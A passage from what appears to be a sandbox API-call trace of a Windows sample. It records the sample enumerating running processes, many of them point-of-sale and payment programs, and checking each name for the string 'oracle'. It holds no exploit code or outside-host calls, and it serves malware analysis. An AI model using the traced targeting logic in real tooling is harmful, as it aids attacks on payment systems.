lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.285] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543fb8 [0092.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3543fb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.285] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0092.286] StrStrIA (lpFirst="whatsapp.exe", lpSrch="oracle") returned 0x0 [0092.286] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.287] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544108 [0092.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3544108, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0092.287] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0092.287] StrStrIA (lpFirst="winscp.exe", lpSrch="oracle") returned 0x0 [0092.287] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0092.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.288] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35430b8 [0092.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35430b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0092.288] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0092.288] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="oracle") returned 0x0 [0092.288] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0092.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.290] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3542e98 [0092.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3542e98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0092.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0092.290] StrStrIA (lpFirst="active-charge.exe", lpSrch="oracle") returned 0x0 [0092.290] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0092.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.291] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543ee0 [0092.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3543ee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.291] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0092.291] StrStrIA (lpFirst="accupos.exe", lpSrch="oracle") returned 0x0 [0092.292] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0092.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.293] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543fd0 [0092.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3543fd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0092.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0092.293] StrStrIA (lpFirst="afr38.exe", lpSrch="oracle") returned 0x0 [0092.293] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0092.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.294] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544048 [0092.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3544048, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0092.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0092.294] StrStrIA (lpFirst="aldelo.exe", lpSrch="oracle") returned 0x0 [0092.294] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0092.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.296] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3544120 [0092.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3544120, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0092.296] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0092.296] StrStrIA (lpFirst="ccv_server.exe", lpSrch="oracle") returned 0x0 [0092.296] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0092.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0092.297] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3542db8 [0092.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3542db8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0092.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0092.297] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="oracle") returned 0x0 [0092.297] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0092.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.298] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35430f8 [0092.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35430f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0092.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0092.299] StrStrIA (lpFirst="creditservice.exe", lpSrch="oracle") returned 0x0 [0092.299] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0092.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.316] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35440d8 [0092.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x35440d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0092.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0092.316] StrStrIA (lpFirst="edcsvr.exe", lpSrch="oracle") returned 0x0 [0092.316] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0092.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.317] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3544138 [0092.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3544138, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0092.317] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0092.317] StrStrIA (lpFirst="fpos.exe", lpSrch="oracle") returned 0x0 [0092.317] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0092.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.318] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3544168 [0092.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3544168, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0092.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0092.319] StrStrIA (lpFirst="isspos.exe", lpSrch="oracle") returned 0x0 [0092.319] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0092.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.320] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3543118 [0092.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3543118, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0092.320] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0092.320] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="oracle") returned 0x0 [0092.320] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0092.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.321] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544018 [0092.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3544018, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.321] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0092.321] StrStrIA (lpFirst="omnipos.exe", lpSrch="oracle") returned 0x0 [0092.321] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0092.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.323] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543f10 [0092.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3543f10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0092.323] StrStrIA (lpFirst="spcwin.exe", lpSrch="oracle") returned 0x0 [0092.323] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0092.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.324] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3542fb8 [0092.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3542fb8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0092.324] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0092.324] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="oracle") returned 0x0 [0092.324] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0092.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.326] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3544180 [0092.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3544180, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0092.326] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0092.326] StrStrIA (lpFirst="utg2.exe", lpSrch="oracle") returned 0x0 [0092.326] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0092.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.327] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543f28 [0092.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3543f28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0092.327] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0092.327] StrStrIA (lpFirst="saying.exe", lpSrch="oracle") returned 0x0 [0092.327] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0092.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.328] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543fe8 [0092.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3543fe8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0092.328] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0092.328] StrStrIA (lpFirst="ripe.exe", lpSrch="oracle") returned 0x0 [0092.328] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0092.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.330] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543f40 [0092.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3543f40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0092.330] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0092.330] StrStrIA (lpFirst="acoustic.exe", lpSrch="oracle") returned 0x0 [0092.330] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0092.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.339] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543fa0 [0092.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3543fa0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0092.339] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0092.339] StrStrIA (lpFirst="mail.exe", lpSrch="oracle") returned 0x0 [0092.339] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.340] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543f88 [0092.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3543f88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0092.340] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0092.341] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="oracle") returned 0x0 [0092.341] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 